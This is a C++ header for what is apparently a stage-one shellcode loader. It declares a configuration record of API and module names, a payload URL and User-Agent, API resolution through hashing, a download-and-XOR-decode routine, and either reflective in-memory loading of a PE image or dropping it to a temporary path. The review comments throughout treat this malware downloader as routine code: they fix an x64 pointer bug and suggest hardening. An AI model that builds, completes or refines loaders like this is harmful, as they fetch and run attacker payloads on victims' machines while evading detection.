src/Shellcode-Stage1/Loader/loader.h
#ifndef _LOADER_H
#define _LOADER_H
#include <Windows.h>
#include <stdint.h>
#include "winapi.h"
/*
 * Configuration record consumed by Loader() (declared below).
 *
 * Every strXxx member is a fixed-size CHAR array sized exactly for the
 * module/API name it is meant to hold plus its NUL terminator
 * (e.g. strKernel32[9] = "kernel32" + NUL, strWtoi[6] = "_wtoi" + NUL).
 * There is no slack byte, so whoever fills the record must write the
 * terminator; a reader that treats a field as a C string with the
 * terminator missing will run into the next field.
 *
 * The layout is an interface with whatever produces the record (dwMagic
 * presumably lets that producer/locator find it -- confirm). Do not
 * reorder, resize or insert fields without updating that side.
 *
 * NOTE(review): the names are stored as plaintext CHAR arrays. If
 * dwXorKey is meant to conceal this record, confirm the producer encodes
 * it -- nothing in this header does.
 */
typedef struct _LOADER_CONFIG
{
DWORD dwMagic;      /* marker value; meaning defined by the producer, not here */
DWORD dwXorKey;     /* XOR key handed to Decrypt()/DownloadAndDecrypt() */
CHAR strUrl[150];   /* payload URL; NUL-terminated within the array (no length field) */
/* Module names (each array = name + NUL). */
CHAR strKernel32[9];
CHAR strNtDll[6];
CHAR strWinInet[8];
CHAR strShell32[8];
/* Export names resolved into the VTABLE (each array = name + NUL). */
CHAR strVirtualAlloc[13];
CHAR strVirtualProtect[15];
CHAR strCreateFileW[12];
CHAR strWriteFile[10];
CHAR strCloseHandle[12];
CHAR strGetShortPathNameW[18];
CHAR strGetTempPathW[13];
CHAR strSHGetKnownFolderPath[21];
CHAR strLoadLibraryW[13];
CHAR strFreeLibrary[12];
CHAR strDeleteFileW[12];
CHAR strInternetOpenA[14];
CHAR strInternetOpenUrlA[17];
CHAR strHttpQueryInfoW[15];
CHAR strInternetReadFileExA[20];
CHAR strWtoi[6];
CHAR strExitProcess[12];
CHAR strExportName[9];   /* name of the export to call in the payload (presumably; see _LoadLibrary) */
CHAR strUserAgent[187];  /* User-Agent string for the download; NUL-terminated within the array */
} LOADER_CONFIG, *PLOADER_CONFIG;
/*
 * Table of resolved API pointers used throughout the loader. LoadVTable()
 * (declared below) populates it; the pointer typedefs come from winapi.h.
 *
 * The first slot points at the LOADER_CONFIG the stage was given, so code
 * holding a PVTABLE can reach the configuration as well. The table has no
 * size or version field: adding or reordering an entry changes the layout
 * for every consumer, including any non-C code (e.g. the Startup stub, if
 * it is assembly) that indexes it by offset.
 */
typedef struct _VTABLE
{
PLOADER_CONFIG lpLoaderConfig;          /* the configuration record */
GETPROCADDRESS GetProcAddress;          /* bootstrap resolver (see GetPointers) */
LOADLIBRARYA LoadLibraryA;              /* bootstrap loader (see GetPointers) */
VIRTUALALLOC VirtualAlloc;
VIRTUALPROTECT VirtualProtect;
CREATEFILEW CreateFileW;
WRITEFILE WriteFile;
CLOSEHANDLE CloseHandle;
GETSHORTPATHNAMEW GetShortPathNameW;
GETTEMPPATHW GetTempPathW;
SHGETKNOWNFOLDERPATH SHGetKnownFolderPath;
LOADLIBRARYW LoadLibraryW;
FREELIBRARY FreeLibrary;
DELETEFILEW DeleteFileW;
INTERNETOPENA InternetOpenA;
INTERNETOPENURLA InternetOpenUrlA;
INTERNETREADFILEEXA InternetReadFileExA;
HTTPQUERYINFOW HttpQueryInfoW;
WTOI wtoi;                              /* paired with strWtoi in the config */
EXITPROCESS ExitProcess;
} VTABLE, *PVTABLE;
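/*
 * Pointer-arithmetic helpers.
 *
 * All three widen through uintptr_t so the intermediate value is
 * pointer-sized on both x86 and x64 builds. The previous CALC_OFFSET_DISP
 * went through DWORD, which truncates a 64-bit base address before the
 * addition and yields a bogus pointer on x64, while its siblings used
 * ULONG64 -- the three now agree. Every argument is parenthesized, so an
 * expression such as `buf + 12` is cast as a whole rather than having the
 * cast bind to its first operand (CALC_DISP previously computed
 * `(ULONG64)buf + 12` for that input).
 *
 * None of these checks for overflow or that the result stays inside the
 * object; callers that derive offsets from a parsed image must bound them
 * against that image's size first.
 */

/* (type)(ptr + offset): advance ptr by a byte offset. */
#define CALC_OFFSET(type, ptr, offset) \
    ((type)((uintptr_t)(ptr) + (uintptr_t)(offset)))

/* (type)(base + offset + disp): advance base by an offset plus a displacement. */
#define CALC_OFFSET_DISP(type, base, offset, disp) \
    ((type)((uintptr_t)(base) + (uintptr_t)(offset) + (uintptr_t)(disp)))

/* (type)(offset - ptr): byte distance from ptr to offset. */
#define CALC_DISP(type, offset, ptr) \
    ((type)((uintptr_t)(offset) - (uintptr_t)(ptr)))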
/*
 * Header of one base-relocation block as laid out in a PE .reloc section:
 * the same two DWORDs as winnt.h's IMAGE_BASE_RELOCATION (VirtualAddress,
 * SizeOfBlock). Per the PE format BlockSize covers this header plus the
 * WORD entries that follow it. Both values come from the image being
 * loaded, so a consumer must check that PageRVA + each entry offset lies
 * inside the mapped image and that BlockSize fits inside the relocation
 * directory before walking the entries.
 */
typedef struct base_relocation_block
{
DWORD PageRVA;     /* RVA of the 4 KiB page the following entries apply to */
DWORD BlockSize;   /* total size of this block in bytes, header included */
} base_relocation_block_t;
/*
 * One 16-bit relocation entry: low 12 bits = offset within the block's
 * page, high 4 bits = relocation type (IMAGE_REL_BASED_*). This relies on
 * MSVC allocating the first-declared bit-field in the low-order bits of
 * the WORD; it is not portable to compilers that fill from the high end.
 * Unknown type values should be rejected, not silently skipped, by the
 * code that applies these.
 */
typedef struct base_relocation_entry
{
WORD offset : 12;
WORD type : 4;
} base_relocation_entry_t;
/*
 * Signatures used to call into the loaded image. CRTMAIN/CRTMAIN64 take a
 * single machine-word argument (DWORD vs DWORD64); EXPORT takes none and
 * EXPORT2 one DWORD. Which one is used is not determined here (presumably
 * by the target's bitness and by whether an export name is configured).
 * Note that in C++ -- which this header is, given the extern "C" blocks --
 * `()` means "no parameters", so EXPORT must not be invoked with arguments.
 */
typedef int (WINAPI *CRTMAIN)(DWORD);
typedef int (WINAPI *CRTMAIN64)(DWORD64);
typedef int (WINAPI *EXPORT)();
typedef int (WINAPI *EXPORT2)(DWORD);
/* Entry stub; defined outside this header (possibly in assembly -- confirm). */
extern "C" VOID Startup();
/* Main loader routine; consumes the configuration record. */
extern "C" VOID Loader(__in PLOADER_CONFIG lpLoaderConfig);
/* Fills *lpTable with resolved API pointers. Returns FALSE on failure, in
 * which case the table contents must not be used. */
extern "C" BOOL LoadVTable(__out PVTABLE lpTable);
/* Bootstrap: resolves GetProcAddress, LoadLibraryA and the kernel32 module
 * handle into the three out-parameters. Returns FALSE on failure; callers
 * must check it before dereferencing any of the outputs. */
extern "C" BOOL GetPointers(__out PGETPROCADDRESS fpGetProcAddress, __out PLOADLIBRARYA fpLoadLibraryA, __out PHANDLE pKernel32);
/* Returns the kernel32 module handle (how it is located is not shown here). */
extern "C" HANDLE GetKernel32Handle();
/* Hashes uLen units of lpBuffer; bUnicode presumably selects WCHAR vs CHAR
 * units -- confirm against the definition. uLen is trusted: the caller must
 * pass the real length, as there is no terminator scan implied by this
 * interface. */
extern "C" DWORD GetStringHash(__in LPVOID lpBuffer, __in BOOL bUnicode, __in UINT uLen);
/* Fetches strUrl using strUserAgent and returns a buffer holding the body,
 * XOR-decoded with dwXorKey when bXored is TRUE. dwFileLen is a pointer,
 * which suggests the length is written back -- if so it should be annotated
 * __out, not __in. Who owns/frees the returned buffer is not stated here.
 * NOTE(review): this interface carries no integrity or authenticity check;
 * a XOR key is obfuscation, not authenticated encryption, so anything on the
 * network path can substitute the payload that gets loaded. */
extern "C" LPBYTE DownloadAndDecrypt(__in PVTABLE lpTable, __in LPSTR strUserAgent, __in LPSTR strUrl, __in LPDWORD dwFileLen, __in DWORD dwXorKey, BOOL bXored);
/* Reads the response for hUrl into the caller-supplied lpBuffer; dwBufferLen
 * bounds the read. The caller sizes the buffer (presumably from
 * HttpQueryInfoW + wtoi, i.e. a server-controlled Content-Length -- confirm),
 * so that value must be range-checked before it is used for allocation. */
extern "C" BOOL DownloadFile(__in PVTABLE lpTable, __in HINTERNET hUrl, __in LPBYTE lpBuffer, __in DWORD dwBufferLen);
/* XOR-decodes dwBuffLen bytes of lpBuffer with dwXorKey. Whether it works in
 * place and returns lpBuffer, or returns a new buffer, is not visible here. */
extern "C" LPBYTE Decrypt(__in LPBYTE lpBuffer, __in DWORD dwBuffLen, __in DWORD dwXorKey);
#ifdef LOAD_FROM_DISK
/* Disk-backed variant: DropFile writes dwFileSize bytes of lpFileBuffer to a
 * file (at the path GetDropPath chooses, presumably via GetTempPathW /
 * SHGetKnownFolderPath from the vtable -- confirm) and returns that path.
 * NOTE(review): unlike every other function in this header these two lack
 * extern "C"; if they are defined in C++ their names are mangled, which only
 * matters if something outside C++ (e.g. the Startup stub) references them.
 * This path also leaves the decoded payload on disk; DeleteFileW being in
 * the vtable suggests a cleanup step -- confirm it runs on every exit path. */
LPWSTR GetDropPath(__in PVTABLE lpTable);
LPWSTR DropFile(__in PVTABLE lpTable, __in LPBYTE lpFileBuffer, __in DWORD dwFileSize);
#else
/* In-memory variant: maps lpRawBuffer (presumably a raw PE image, given the
 * base_relocation_* types above) and returns its base; *lpExport receives a
 * resolved export (strExportName in the config, presumably -- confirm).
 * Every header field read from lpRawBuffer is attacker-influenced input
 * (see DownloadAndDecrypt) and must be bounds-checked against the buffer. */
extern "C" LPVOID _LoadLibrary(__in PVTABLE lpTable, __in LPVOID lpRawBuffer, __out LPVOID *lpExport);
#endif
// CRT replacements: freestanding copy/fill routines so the stage does not
// depend on the C runtime. (Identifiers containing "__" are reserved for the
// implementation; a rename would avoid collisions, but changing them here
// alone would break the definitions elsewhere.)
/* Copies dwCount bytes from lpSrc to lpDst; presumably memcpy semantics with
 * no overlap handling -- confirm. Return value is not documented here. */
extern "C" LPVOID __MEMCPY__(__in LPVOID lpDst, __in LPVOID lpSrc, __in DWORD dwCount);
/* Fills dwSize bytes at p with cValue. */
extern "C" VOID __MEMSET__(__in LPVOID p, __in CHAR cValue, __in DWORD dwSize);
#endif